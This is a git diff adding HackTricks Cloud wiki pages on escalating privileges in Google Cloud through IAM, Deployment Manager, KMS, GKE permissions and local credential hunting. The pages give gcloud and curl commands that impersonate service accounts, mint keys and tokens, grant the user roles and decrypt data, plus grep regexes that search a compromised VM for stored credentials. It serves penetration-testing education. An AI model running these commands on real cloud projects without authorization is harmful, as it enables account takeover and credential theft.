+With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
+
+### `container.pods.portForward`
+
+As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
+
+### `container.serviceAccounts.createToken`
+
+Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
+
+### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update`
+
+These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
+For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
new file mode 100644
index 0000000000..38c2f36ce7
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
@@ -0,0 +1,55 @@
+# GCP - Deploymentmaneger Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## deploymentmanager
+
+### `deploymentmanager.deployments.create`
+
+This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
+
+You could actually **launch any resource** listed in `gcloud deployment-manager types list`
+
+In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
+
+### `deploymentmanager.deployments.update`
+
+This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
+
+Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
+
+### `deploymentmanager.deployments.setIamPolicy`
+
+This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section.
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
new file mode 100644
index 0000000000..ed07184525
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
@@ -0,0 +1,170 @@
+# GCP - IAM Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM
+
+Find more information about IAM in:
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+### `iam.roles.update` (`iam.roles.get`)
+
+An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like:
+
+```bash
+gcloud iam roles update <rol name> --project <project> --add-permissions <permission>
+```
+
+You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`)
+
+An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
+
+```bash
+gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
+  auth print-access-token
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+### `iam.serviceAccountKeys.create`
+
+An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
+
+```bash
+gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json
+
+gcloud auth activate-service-account --key-file=sa_cred.json
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permissions `iam.serviceAccountKeys.create` is also needed.
+
+### `iam.serviceAccounts.implicitDelegation`
+
+If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Service Account that has the **`iam.serviceAccounts.getAccessToken`** permission on a third Service Account, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
+
+![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png)
+
+Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly:
+
+```bash
+curl -X POST \
+    'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \
+    -H 'Content-Type: application/json' \
+    -H 'Authorization: Bearer '"$(gcloud auth print-access-token)" \
+    -d '{
+        "delegates": ["projects/-/serviceAccounts/'"${DELEGATED_SERVICE_ACCOUNT}"'"],
+        "scope": ["https://www.googleapis.com/auth/cloud-platform"]
+    }'
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+### `iam.serviceAccounts.signBlob`
+
+An attacker with the mentioned permissions will be able to **sign of arbitrary payloads in GCP**. So it'll be possible to **create an unsigned JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+### `iam.serviceAccounts.signJwt`
+
+An attacker with the mentioned permissions will be able to **sign well-formed JSON web tokens (JWTs)**. The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes.
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
+
+### `iam.serviceAccounts.setIamPolicy` <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a>
+
+An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA:
+
+```bash
+gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
+	--member="user:username@domain.com" \
+	--role="roles/iam.serviceAccountTokenCreator"
+
+# If you still have prblem grant yourself also this permission
+gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \
+    --member="user:username@domain.com" \
+    --role="roles/iam.serviceAccountUser"
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
+
+### `iam.serviceAccounts.actAs`
+
+The **iam.serviceAccounts.actAs permission** is like the **iam:PassRole permission from AWS**. It's essential for executing tasks, like initiating a Compute Engine instance, as it grants the ability to "actAs" a Service Account, ensuring secure permission management. Without this, users might gain undue access. Additionally, exploiting the **iam.serviceAccounts.actAs** involves various methods, each requiring a set of permissions, contrasting with other methods that need just one.
+
+#### Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
+
+Impersonating a service account can be very useful to **obtain new and better privileges**. There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):
+
+* Authentication **using RSA private keys** (covered above)
+* Authorization **using Cloud IAM policies** (covered here)
+* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
+
+### `iam.serviceAccounts.getOpenIdToken`
+
+An attacker with the mentioned permissions will be able to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
+
+According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT.
+
+You can generate an OpenIDToken (if you have the access) with:
+
+```bash
+# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA
+gcloud auth activate-service-account --key-file=/path/to/svc_account.json
+# Then, generate token
+gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com
+```
+
+Then you can just use it to access the service with:
+
+```bash
+curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
+```
+
+Some services that support authentication via this kind of tokens are:
+
+* [Google Cloud Run](https://cloud.google.com/run/)
+* [Google Cloud Functions](https://cloud.google.com/functions/docs/)
+* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
+* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
+
+You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
new file mode 100644
index 0000000000..6b209238a0
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
@@ -0,0 +1,116 @@
+# GCP - KMS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+Info about KMS:
+
+{% content-ref url="../gcp-services/gcp-kms-enum.md" %}
+[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md)
+{% endcontent-ref %}
+
+Note that in KMS the **permission** are not only **inherited** from Orgs, Folders and Projects but also from **Keyrings**.
+
+### `cloudkms.cryptoKeyVersions.useToDecrypt`
+
+You can use this permission to **decrypt information with the key** you have this permission over.
+
+```bash
+gcloud kms decrypt \
+    --location=[LOCATION] \
+    --keyring=[KEYRING_NAME] \
+    --key=[KEY_NAME] \
+    --version=[KEY_VERSION] \
+    --ciphertext-file=[ENCRYPTED_FILE_PATH] \
+    --plaintext-file=[DECRYPTED_FILE_PATH]
+```
+
+### `cloudkms.cryptoKeys.setIamPolicy`
+
+An attacker with this permission could **give himself permissions** to use the key to decrypt information.
+
+```bash
+gcloud kms keys add-iam-policy-binding [KEY_NAME] \
+    --location [LOCATION] \
+    --keyring [KEYRING_NAME] \
+    --member [MEMBER] \
+    --role roles/cloudkms.cryptoKeyDecrypter
+```
+
+### `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation`
+
+Here's a conceptual breakdown of how this delegation works:
+
+1. **Service Account A** has direct access to decrypt using a specific key in KMS.
+2. **Service Account B** is granted the `useToDecryptViaDelegation` permission. This allows it to request KMS to decrypt data on behalf of Service Account A.
+
+The usage of this **permission is implicit in the way that the KMS service checks permissions** when a decryption request is made.
+
+When you make a standard decryption request using the Google Cloud KMS API (in Python or another language), the service **checks whether the requesting service account has the necessary permissions**. If the request is made by a service account with the **`useToDecryptViaDelegation`** permission, KMS verifies whether this **account is allowed to request decryption on behalf of the entity that owns the key**.
+
+#### Setting Up for Delegation
+
+1. **Define the Custom Role**: Create a YAML file (e.g., `custom_role.yaml`) that defines the custom role. This file should include the `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` permission. Here's an example of what this file might look like:
+
+```yaml
+title: "KMS Decryption via Delegation"
+description: "Allows decryption via delegation"
+stage: "GA"
+includedPermissions:
+- "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"
+```
+
+2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project:
+
+{% code overflow="wrap" %}
+```bash
+gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml
+```
+{% endcode %}
+
+Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID.
+
+3. **Grant the Custom Role to a Service Account**: Assign your custom role to a service account that will be using this permission. Use the following command:
+
+```bash
+# Give this permission to the service account to impersonate
+gcloud projects add-iam-policy-binding [PROJECT_ID] \
+    --member "serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]" \
+    --role "projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]"
+
+# Give this permission over the project to be able to impersonate any SA
+gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \
+    --member="serviceAccount:[SERVICE_ACCOUNT_EMAIL]" \
+    --role="projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation"
+```
+
+Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID and the email of the service account, respectively.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
new file mode 100644
index 0000000000..8abd52c606
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -0,0 +1,122 @@
+# GCP - local privilege escalation ssh pivoting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
+
+Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
+
+## Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a>
+
+**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
+
+As IAM is go granular, an account may have **read/write** privileges over a resource but **no list privileges**.
+
+A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.
+
+Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.
+
+You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
+
+## Custom Metadata
+
+Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the **instance** and **project level**. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
+
+Moreover, it's possible to add **userdata**, which is a script that will be **executed everytime** the machine is started or restarted and that can be **accessed from the metadata endpoint also.**
+
+For more info check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+## **Abusing IAM permissions**
+
+Most of the following proposed permissions are **given to the default Compute SA,** the only problem is that the **default access scope prevents the SA from using them**. However, if **`cloud-platform`** **scope** is enabled or just the **`compute`** **scope** is enabled, you will be **able to abuse them**.
+
+Check the following permissions:
+
+* [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin)
+* [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin)
+* [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata)
+* [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata)
+* [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy)
+
+## Search for Keys in the filesystem
+
+Check if other users have loggedin in gcloud inside the box and left their credentials in the filesystem:
+
+```
+sudo find / -name "gcloud"
+```
+
+These are the most interesting files:
+
+* `~/.config/gcloud/credentials.db`
+* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
+* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
+* `~/.credentials.json`
+
+### More API Keys regexes
+
+```bash
+TARGET_DIR="/path/to/whatever"
+
+# Service account keys
+grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
+    "$TARGET_DIR"
+
+# Legacy GCP creds
+grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
+    "$TARGET_DIR"
+
+# Google API keys
+grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
+    "$TARGET_DIR"
+
+# Google OAuth tokens
+grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
+    "$TARGET_DIR"
+
+# Generic SSH keys
+grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
+    "$TARGET_DIR"
+
+# Signed storage URLs
+grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
+    "$TARGET_DIR"
+
+# Signed policy documents in HTML
+grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
+    "$TARGET_DIR"
+```
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
